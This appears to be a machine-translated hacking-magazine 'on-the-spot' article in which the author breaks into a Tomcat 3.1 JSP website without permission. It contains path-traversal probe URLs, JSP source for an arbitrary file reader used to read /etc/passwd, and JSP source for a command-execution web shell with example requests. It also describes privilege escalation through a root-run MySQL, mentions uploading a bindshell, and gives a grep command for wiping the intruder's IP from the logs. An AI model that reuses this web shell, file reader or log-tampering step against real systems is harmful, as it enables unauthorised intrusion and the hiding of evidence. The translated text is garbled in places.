On-the-spot report: How to invade the website based on JSP

Js

Editor:"on-the-spot documentary" is a new small section of hacker attack and defense zone. Here we will introduce you to some of the real online hacking cases, and in the past from the site security personnel to tell the difference, these cases are from the point of view of the hacker to describe the entire process of intrusion. With these examples, you can learn a lot about the technical tools and strategies that hackers use to invade a Web site. With specific technical details, this column will be dealt with accordingly, because our aim is to improve the security of the network through such technical exchanges, rather than maliciously attacking others ' computers.

It is a chance to browse to a website, the page is refreshing to feel very comfortable. Web site is developed with JSP, for personal interests, I decided to test the security of its system.

Telnet www.target.com 8080 Get/chinansl http/1.1 [Enter] [Enter]

The results returned are as follows:

http/1.0 404 Not Found Date:sun, April 2001 07:49:13 GMT Servlet-engine:tomcat Web server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2 .2.12 i386; Java.vendor=blackdown Java-linux Team) Content-language:en Content-type:text/html status:404 〈h1〉error:404〈/h1〉 〈h2〉location:/chinansl〈/h2〉file not Found〈br〉/chinansl

Gets the name "Tomcat 3.1" for the running webserver. Remember to have found this version of the vulnerability, and post to Bugtrap went up.

Recall, presumably through the "..." Technology can exit the Web directory, so:

Http://target:8080/../../../../%00.jsp (NO) Http://target:8080/file/index.jsp (NO) Http://target:8080/index.JSP (NO) http://target:8080/index.jsp%81 (NO) Http://target:8080/index.js%70 (NO) http://target:8080/index.jsp%2581 (NO) http://target:8080/WEB-INF/(NO)

It seems that the security situation seems to be good, let's do a deeper test. Tomcat 3.1 brings up a management tool that allows you to view directories and files under the Web and add context. So try:

http://target:8080/admin/

The administrator did not delete or prohibit access to this directory, from a security point of view, this should be considered a more important error.

Next, click the "VIEW All" button to list the names of some files and directories under the Web directory, and quickly discover a component that uploads the file to the other's web directory via this component:

〈%@ page import= "java.io.*"%〉 〈% String file = request.getparameter ("file"); String str = ""; FileInputStream FIS = null; DataInputStream dis = null; try{ FIS = new FileInputStream (file); dis = new DataInputStream (FIS); while (true) { try{ str = Dis.readline (); }catch (Exception e) {} if (str = null) break; Out.print (str+ "〈br〉"); } }catch (IOException e) {} %〉

Then execute:

http://target:8080/upload/test.jsp?file=/etc/passwd

The password came out. The next process is to guess the password, without success. However, now the equivalent of a shell, can not guess the password to the first IE as a shell environment.

Then write a JSP file:

〈%@ page import= "java.io.*"%〉 〈% try { String cmd = request.getparameter ("cmd"); Process child = Runtime.getruntime (). exec (CMD); InputStream in = Child.getinputstream (); int C; while ((c = in.read ())!=-1) { Out.print ((char) c); } In.close (); try { Child.waitfor (); catch (Interruptedexception e) { E.printstacktrace (); } catch (IOException e) { System.err.println (e); } %〉

Then put the JSP through the upload upload, there is a shell.

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/ (Detailed results are not listed here)

How do I get root permissions? After a search to find the system installed MySQL, and from the source code of the JSP to get the password of MySQL, implementation:

Sqld "〉http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld

Show:

Root 87494 0.2 1.9 17300 4800 p0-s 28jun01 5:54.72/usr/local/data/mysql

The system is MySQL running as root. Then I thought, now that I know the password for MySQL, I can write a shell program, let it create a table, then put my data into the table, then use the "Select ... into outfile;" Way to create a file on the system that allows the user to run my program while performing Su. (Remember apache.org was once invaded?) This approach is used by hackers).

After that, it's simpler to upload programs like Bindshell, run, get nobody permissions, and use the setuid shell created by Su Root to make itself root.

But then it was actually done, and the result was quite unexpected:

Http://target:8080/upload/cmd.jsp?cmd=id

Show:

Uid=0 (root) gid=0 (XXX) groups=0 (XXX), 2 (XXX), 3 (XXX), 4 (XXX), 5 (XXX), (XXX), (XXX)

It turns out that this web shell was root!. Security settings for administrators how exactly do you do that?

Http://target:8080/upload/cmd.jsp?cmd=ps+aux It was running as root (not listed)

The rest of the story:

1, delete my Telnet record.

2, delete the HTTP log.

Clear Log I use the following method: Cat xxx |grep-v "IP" 〉〉temp and then cover the temp files that I have modified.

To illustrate the point, I did not change the site's page, because I am just a network security enthusiasts. So, send an email to tell system admin! Of course, by the way, I mentioned in my letter that we would be very happy if UNITA information technology was needed to provide him with security services.